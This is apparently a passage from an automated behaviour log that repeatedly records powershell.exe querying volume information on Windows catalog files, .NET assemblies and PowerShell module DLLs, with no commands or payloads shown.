Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
